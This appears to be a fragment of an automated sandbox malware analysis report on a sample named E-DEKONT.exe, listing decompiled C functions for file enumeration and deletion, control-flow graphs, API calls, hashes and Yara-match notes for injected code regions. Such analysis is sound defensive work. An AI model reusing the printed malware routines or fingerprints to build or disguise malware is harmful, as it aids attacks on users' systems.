                                                                            0x10001dc8
                                                                            0x10001dce
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10001dd4
                                                                            0x10001de1
                                                                            0x10001de7
                                                                            0x10001df1
                                                                            0x10001df7
                                                                            0x10001dff
                                                                            0x10001e0f
                                                                            0x00000000
                                                                            0x10001e0f

                                                                            APIs
                                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                            • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                            • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                            • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                            • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$lstrcpy$Alloc
                                                                            • String ID:
                                                                            • API String ID: 4227406936-0
                                                                            • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                            • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                            • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                            • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405990 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 706 405990-4059b6 call 405c5b 709 4059b8-4059ca DeleteFileW 706->709 710 4059cf-4059d6 706->710 711 405b4c-405b50 709->711 712 4059d8-4059da 710->712 713 4059e9-4059f9 call 406282 710->713 714 4059e0-4059e3 712->714 715 405afa-405aff 712->715 719 405a08-405a09 call 405b9f 713->719 720 4059fb-405a06 lstrcatW 713->720 714->713 714->715 715->711 718 405b01-405b04 715->718 721 405b06-405b0c 718->721 722 405b0e-405b16 call 4065c5 718->722 723 405a0e-405a12 719->723 720->723 721->711 722->711 730 405b18-405b2c call 405b53 call 405948 722->730 726 405a14-405a1c 723->726 727 405a1e-405a24 lstrcatW 723->727 726->727 729 405a29-405a45 lstrlenW FindFirstFileW 726->729 727->729 731 405a4b-405a53 729->731 732 405aef-405af3 729->732 746 405b44-405b47 call 4052e6 730->746 747 405b2e-405b31 730->747 736 405a73-405a87 call 406282 731->736 737 405a55-405a5d 731->737 732->715 735 405af5 732->735 735->715 748 405a89-405a91 736->748 749 405a9e-405aa9 call 405948 736->749 740 405ad2-405ae2 FindNextFileW 737->740 741 405a5f-405a67 737->741 740->731 745 405ae8-405ae9 FindClose 740->745 741->736 742 405a69-405a71 741->742 742->736 742->740 745->732 746->711 747->721 750 405b33-405b42 call 4052e6 call 406048 747->750 748->740 751 405a93-405a9c call 405990 748->751 759 405aca-405acd call 4052e6 749->759 760 405aab-405aae 749->760 750->711 751->740 759->740 763 405ab0-405ac0 call 4052e6 call 406048 760->763 764 405ac2-405ac8 760->764 763->740 764->740
                                                                            C-Code - Quality: 98%
                                                                            			E00405990(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C5B(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406282(0x42f250, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B9F(_t68);
					} else {
						lstrcatW(0x42f250, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f250,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406282(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405948(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052E6(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E004052E6(0xfffffff1, _t68);
											E00406048(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405990(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f250 - 0x5c;
					if( *0x42f250 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004065C5(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B53(_t68);
							_t38 = E00405948(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052E6(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052E6(0xfffffff1, _t68);
							return E00406048(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                            0x0040599a
                                                                            0x0040599f
                                                                            0x004059a8
                                                                            0x004059ab
                                                                            0x004059b3
                                                                            0x004059b6
                                                                            0x004059b9
                                                                            0x004059c1
                                                                            0x004059c3
                                                                            0x004059c4
                                                                            0x00000000
                                                                            0x004059c4
                                                                            0x004059cf
                                                                            0x004059d2
                                                                            0x004059d2
                                                                            0x004059d2
                                                                            0x004059d6
                                                                            0x004059e9
                                                                            0x004059f0
                                                                            0x004059f5
                                                                            0x004059f9
                                                                            0x00405a09
                                                                            0x004059fb
                                                                            0x00405a01
                                                                            0x00405a01
                                                                            0x00405a0e
                                                                            0x00405a12
                                                                            0x00405a1e
                                                                            0x00405a24
                                                                            0x00405a29
                                                                            0x00405a2f
                                                                            0x00405a3a
                                                                            0x00405a40
                                                                            0x00405a42
                                                                            0x00405a45
                                                                            0x00405aef
                                                                            0x00405aef
                                                                            0x00405af3
                                                                            0x00405af5
                                                                            0x00405af5
                                                                            0x00405af5
                                                                            0x00405af5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405a4b
                                                                            0x00405a4b
                                                                            0x00405a4b
                                                                            0x00405a53
                                                                            0x00405a73
                                                                            0x00405a7b
                                                                            0x00405a80
                                                                            0x00405a87
                                                                            0x00405aa2
                                                                            0x00405aa7
                                                                            0x00405aa9
                                                                            0x00405acd
                                                                            0x00405aab
                                                                            0x00405aab
                                                                            0x00405aae
                                                                            0x00405ac2
                                                                            0x00405ab0
                                                                            0x00405ab3
                                                                            0x00405abb
                                                                            0x00405abb
                                                                            0x00405aae
                                                                            0x00405a89
                                                                            0x00405a8f
                                                                            0x00405a91
                                                                            0x00405a97
                                                                            0x00405a97
                                                                            0x00405a91
                                                                            0x00000000
                                                                            0x00405a87
                                                                            0x00405a55
                                                                            0x00405a5d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405a5f
                                                                            0x00405a67
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405a69
                                                                            0x00405a71
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405ad2
                                                                            0x00405ada
                                                                            0x00405ae0
                                                                            0x00405ae0
                                                                            0x00405ae9
                                                                            0x00000000
                                                                            0x00405ae9
                                                                            0x00405a14
                                                                            0x00405a1c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004059d8
                                                                            0x004059d8
                                                                            0x004059da
                                                                            0x00405afa
                                                                            0x00405afc
                                                                            0x00405aff
                                                                            0x00405b50
                                                                            0x00405b50
                                                                            0x00405b50
                                                                            0x00405b01
                                                                            0x00405b04
                                                                            0x00405b0f
                                                                            0x00405b14
                                                                            0x00405b16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405b19
                                                                            0x00405b25
                                                                            0x00405b2a
                                                                            0x00405b2c
                                                                            0x00000000
                                                                            0x00405b47
                                                                            0x00405b2e
                                                                            0x00405b31
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405b36
                                                                            0x00000000
                                                                            0x00405b3d
                                                                            0x00405b06
                                                                            0x00405b06
                                                                            0x00000000
                                                                            0x00405b06
                                                                            0x004059e0
                                                                            0x004059e3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004059e3

                                                                            APIs
                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 004059B9
                                                                            • lstrcatW.KERNEL32(Carrels\Taktfastere.Obm,\*.*), ref: 00405A01
                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405A24
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,Carrels\Taktfastere.Obm,?,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405A2A
                                                                            • FindFirstFileW.KERNELBASE(Carrels\Taktfastere.Obm,?,?,?,0040A014,?,Carrels\Taktfastere.Obm,?,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405A3A
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                                            • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$C:\Users\user\AppData\Local\Temp\$Carrels\Taktfastere.Obm$\*.*
                                                                            • API String ID: 2035342205-2662389400
                                                                            • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                            • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                                            • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                            • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B66D12 Relevance: 9.3, Strings: 7, Instructions: 514COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1015 2b66d12-2b66d21 1016 2b66d27-2b66dc1 GetPEB 1015->1016 1017 2b6352f-2b63542 call 2b63337 1015->1017 1021 2b66dc3-2b66e27 1016->1021 1022 2b63584-2b6359e 1017->1022 1023 2b63544-2b63583 1017->1023 1026 2b67411 1021->1026 1027 2b66e2d-2b66e6b 1021->1027 1023->1022 1030 2b66e6e-2b66f24 1027->1030 1030->1021 1033 2b66f2a-2b66f44 1030->1033 1034 2b8193e-2b81984 1033->1034 1035 2b66f4a-2b66f95 1033->1035 1034->1034 1037 2b81986-2b81a32 1034->1037 1035->1030 1038 2b66f9b-2b66ff7 1035->1038 1037->1017 1041 2b81a38-2b81a49 1037->1041 1042 2b67001-2b6700a 1038->1042 1043 2b81a4b-2b81a77 call 2b82873 call 2b81d70 1041->1043 1044 2b81a7c-2b81a8e 1041->1044 1042->1042 1045 2b6700c-2b6709f 1042->1045 1043->1044 1044->1034 1047 2b81a94-2b81aab 1044->1047 1045->1030 1052 2b670a5-2b672e3 call 2b8729e 1045->1052 1047->1017 1048 2b81ab1-2b81b78 call 2b8182b 1047->1048 1059 2b635b5-2b635b7 1048->1059 1060 2b81b7e-2b81c83 1048->1060 1068 2b672e5-2b672ec 1052->1068 1063 2b6d49e-2b6d4ae 1059->1063 1060->1059 1065 2b81c89-2b81cbc call 2b81cef 1060->1065 1066 2b6d4b0-2b6d4c7 1063->1066 1067 2b6d44e-2b6d47c 1063->1067 1073 2b81cc1-2b81ce5 call 2b81d70 1065->1073 1071 2b6d4c9-2b6d4cf 1066->1071 1067->1063 1068->1068 1072 2b672ee-2b67380 1068->1072 1071->1071 1074 2b6d4d1-2b6d53b 1071->1074 1079 2b67382-2b6738b 1072->1079 1077 2b6d53d-2b6d542 1074->1077 1078 2b6d543-2b6d57a 1077->1078 1081 2b6d57c-2b6d581 1078->1081 1082 2b6d5dd-2b6d5e8 1078->1082 1079->1079 1083 2b6738d-2b67407 1079->1083 1081->1077 1086 2b6d583-2b6d5c0 1081->1086 1089 2b6d623-2b6d625 1082->1089 1090 2b6d5eb-2b6d5fc 1082->1090 1083->1030 1086->1078 1094 2b6d5c2-2b83a4d 1086->1094 1092 2b6d626-2b6d71b 1089->1092 1090->1092 1093 2b6d5fe 1090->1093 1094->1063 1099 2b83a53-2b83a5d 1094->1099 1099->1059 1100 2b83a63 1099->1100 1101 2b83a64-2b83ab4 1100->1101 1101->1101 1102 2b83ab6-2b83ac5 1101->1102 1102->1063 1103 2b83acb-2b83ad7 1102->1103 1103->1059 1104 2b83add-2b83bba 1103->1104 1104->1063 1107 2b83bc0-2b83bca 1104->1107 1107->1059 1108 2b83bd0-2b83c0e 1107->1108
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2#q$AWH$AWH$Q=v/$Q=v/$]kcg$v}Hj
                                                                            • API String ID: 0-1510597524
                                                                            • Opcode ID: d61d3c6bb26cb8d07a5645f2205e9b2f74ab842e2910e34909a1bcbf6b4c7715
                                                                            • Instruction ID: 64d2839b87ffdb8381d972280dd9a1323c07fa5139fd280b23dcbdb245b9ce18
                                                                            • Opcode Fuzzy Hash: d61d3c6bb26cb8d07a5645f2205e9b2f74ab842e2910e34909a1bcbf6b4c7715
                                                                            • Instruction Fuzzy Hash: DE027B796043469FDF309E28CD947DA37B3EF927E0F55416ACC889B244D7398986CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B804ED Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 293fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1122 2b804ed-2b805c0 1124 2b8193e-2b81984 1122->1124 1125 2b805c6-2b805ea 1122->1125 1124->1124 1126 2b81986-2b81a32 1124->1126 1127 2b635b5-2b635b7 1125->1127 1128 2b805f0-2b80745 call 2b80640 1125->1128 1132 2b81a38-2b81a49 1126->1132 1133 2b6352f-2b63542 call 2b63337 1126->1133 1131 2b6d49e-2b6d4ae 1127->1131 1128->1124 1152 2b8074b-2b80762 1128->1152 1135 2b6d4b0-2b6d4c7 1131->1135 1136 2b6d44e-2b6d47c 1131->1136 1139 2b81a4b-2b81a77 call 2b82873 call 2b81d70 1132->1139 1140 2b81a7c-2b81a8e 1132->1140 1149 2b63584-2b6359e 1133->1149 1150 2b63544-2b63583 1133->1150 1142 2b6d4c9-2b6d4cf 1135->1142 1136->1131 1139->1140 1140->1124 1147 2b81a94-2b81aab 1140->1147 1142->1142 1146 2b6d4d1-2b6d53b 1142->1146 1153 2b6d53d-2b6d542 1146->1153 1147->1133 1148 2b81ab1-2b81b78 call 2b8182b 1147->1148 1148->1127 1168 2b81b7e-2b81c83 1148->1168 1150->1149 1152->1127 1158 2b80768-2b80785 CreateFileA 1152->1158 1154 2b6d543-2b6d57a 1153->1154 1159 2b6d57c-2b6d581 1154->1159 1160 2b6d5dd-2b6d5e8 1154->1160 1158->1124 1159->1153 1166 2b6d583-2b6d5c0 1159->1166 1170 2b6d623-2b6d625 1160->1170 1171 2b6d5eb-2b6d5fc 1160->1171 1166->1154 1177 2b6d5c2-2b83a4d 1166->1177 1168->1127 1176 2b81c89-2b81cbc call 2b81cef 1168->1176 1174 2b6d626-2b6d71b 1170->1174 1171->1174 1175 2b6d5fe 1171->1175 1180 2b81cc1-2b81ce5 call 2b81d70 1176->1180 1177->1131 1186 2b83a53-2b83a5d 1177->1186 1186->1127 1187 2b83a63 1186->1187 1188 2b83a64-2b83ab4 1187->1188 1188->1188 1189 2b83ab6-2b83ac5 1188->1189 1189->1131 1190 2b83acb-2b83ad7 1189->1190 1190->1127 1191 2b83add-2b83bba 1190->1191 1191->1131 1194 2b83bc0-2b83bca 1191->1194 1194->1127 1195 2b83bd0-2b83c0e 1194->1195
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(?,B823BD60,7D5E7261), ref: 02B8077C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: AWH$AWH$]kcg
                                                                            • API String ID: 823142352-257656276
                                                                            • Opcode ID: bea1649408ecf56eb5ddf9525c42e930f1e0d57a2f46fd04eddeffed4b227d29
                                                                            • Instruction ID: a3351798048427beb8364786c393431698d1b6666424adf92df9432f79ebe367
                                                                            • Opcode Fuzzy Hash: bea1649408ecf56eb5ddf9525c42e930f1e0d57a2f46fd04eddeffed4b227d29
                                                                            • Instruction Fuzzy Hash: F6913976A053499FDF30AE288DA47DB37A7AF967A0F96402EDC4D97204D73489878B01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B82873 Relevance: 5.4, Strings: 4, Instructions: 372COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AWH$AWH$]kcg$e\?
                                                                            • API String ID: 0-2718312424
                                                                            • Opcode ID: 2c9931f20428980818efc0bc56686bb0f412c20e25f104e8e165772354f9995e
                                                                            • Instruction ID: 9584756c06bda2d3a3584ddc03dd701dc1467d9c5dbce2fbabea4f39be38068f
                                                                            • Opcode Fuzzy Hash: 2c9931f20428980818efc0bc56686bb0f412c20e25f104e8e165772354f9995e
                                                                            • Instruction Fuzzy Hash: 8EC1AD7AB003459FDF30AD6889D47DA37A39F96760FE6406ACC8D9B205D7358987CB02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004065C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004065C5(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x430298); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x430298;
			}




                                                                            0x004065d0
                                                                            0x004065d9
                                                                            0x00000000
                                                                            0x004065e6
                                                                            0x004065dc
                                                                            0x00000000

                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420), ref: 004065D0
                                                                            • FindClose.KERNEL32(00000000), ref: 004065DC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: C:\
                                                                            • API String ID: 2295610775-3404278061
                                                                            • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                            • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                                            • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                            • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B80790 Relevance: 4.3, Strings: 3, Instructions: 542COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AWH$AWH$]kcg
                                                                            • API String ID: 0-257656276
                                                                            • Opcode ID: 97d8e26d737a929be745bd049a1f9eb3c34ef12acdc4381168f0e24a677f06fe
                                                                            • Instruction ID: 84b77df85484865fb5f801cf743a3d580d2ab3c0d9615c3e6d8269ff4ecd5279
                                                                            • Opcode Fuzzy Hash: 97d8e26d737a929be745bd049a1f9eb3c34ef12acdc4381168f0e24a677f06fe
                                                                            • Instruction Fuzzy Hash: 4AF1ACB66043439BCB366E38C9553D67BA39F532B0FA944AECCC98B606D73544C6CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B69092 Relevance: 4.3, Strings: 3, Instructions: 536COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AWH$AWH$]kcg
                                                                            • API String ID: 0-257656276
                                                                            • Opcode ID: 3632c17464fd68107cbbea9ca940621fe113d0261bfe6fe95e4ea741ab9b57b3
                                                                            • Instruction ID: c57460ecbd661d84dde061d29cfb436930a7211202f9b8766c0061dd8aa7e21d
                                                                            • Opcode Fuzzy Hash: 3632c17464fd68107cbbea9ca940621fe113d0261bfe6fe95e4ea741ab9b57b3
                                                                            • Instruction Fuzzy Hash: F5F1CC766043465BDB35AE388D583EA3BE79F922B0FA9846FCCC98B506D73144C6C642
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B80196 Relevance: 4.1, Strings: 3, Instructions: 338COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AWH$AWH$]kcg
                                                                            • API String ID: 0-257656276
                                                                            • Opcode ID: fecdff5bd5d2c2226c0f2afb6b49b2f7c47a7f112171c5170cd7764bb13d4fdf
                                                                            • Instruction ID: 48d2f74b1fc975de326101d89538e07268609eb99e97f6ddea22524d0454aae0
                                                                            • Opcode Fuzzy Hash: fecdff5bd5d2c2226c0f2afb6b49b2f7c47a7f112171c5170cd7764bb13d4fdf
                                                                            • Instruction Fuzzy Hash: BAB18975A003059FDF30BE688D947DA37A39F96BA0F96446ECC8D9B204D734498ACF42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02B62305 Relevance: 4.1, Strings: 3, Instructions: 337COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_2b60000_E-DEKONT.jbxd
